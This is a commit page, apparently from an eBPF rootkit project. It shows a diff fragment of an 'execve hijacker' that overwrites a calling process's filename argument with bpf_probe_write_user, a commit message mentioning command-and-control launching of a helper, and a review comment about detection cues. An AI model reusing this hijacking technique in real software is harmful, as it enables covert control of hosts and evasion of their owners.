Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

h3xduck
2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions


@@ -77,7 +77,6 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
bpf_probe_write_user((void*)(ctx->filename), (void*)org_filename, 1);
return -1;
}
bpf_printk("Char was %u\n", argv_c);
//Everything went fine, but let's fix our modification anyways since the next write to user memory, which
//implies more bytes, may fail.
bpf_probe_write_user((void*)(ctx->filename), (void*)org_filename, 1);
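Review bot: The comment before the last `bpf_probe_write_user` call explains why the byte is written back, but nothing in this hunk documents that the helper modifies memory belonging to the process that called execve, or how the host sees its use. I would add a comment next to the call such as `// bpf_probe_write_user needs CAP_SYS_ADMIN; the kernel logs a warning naming the loader when a program using it is loaded, and kernel lockdown denies the helper`. That log line and the lockdown setting are what a defender keys on, so they belong beside the code that depends on the helper. The page has lost its +/- markers, so which of these lines the commit drops is not certain, and test_write_user_unique starts and ends outside the hunk.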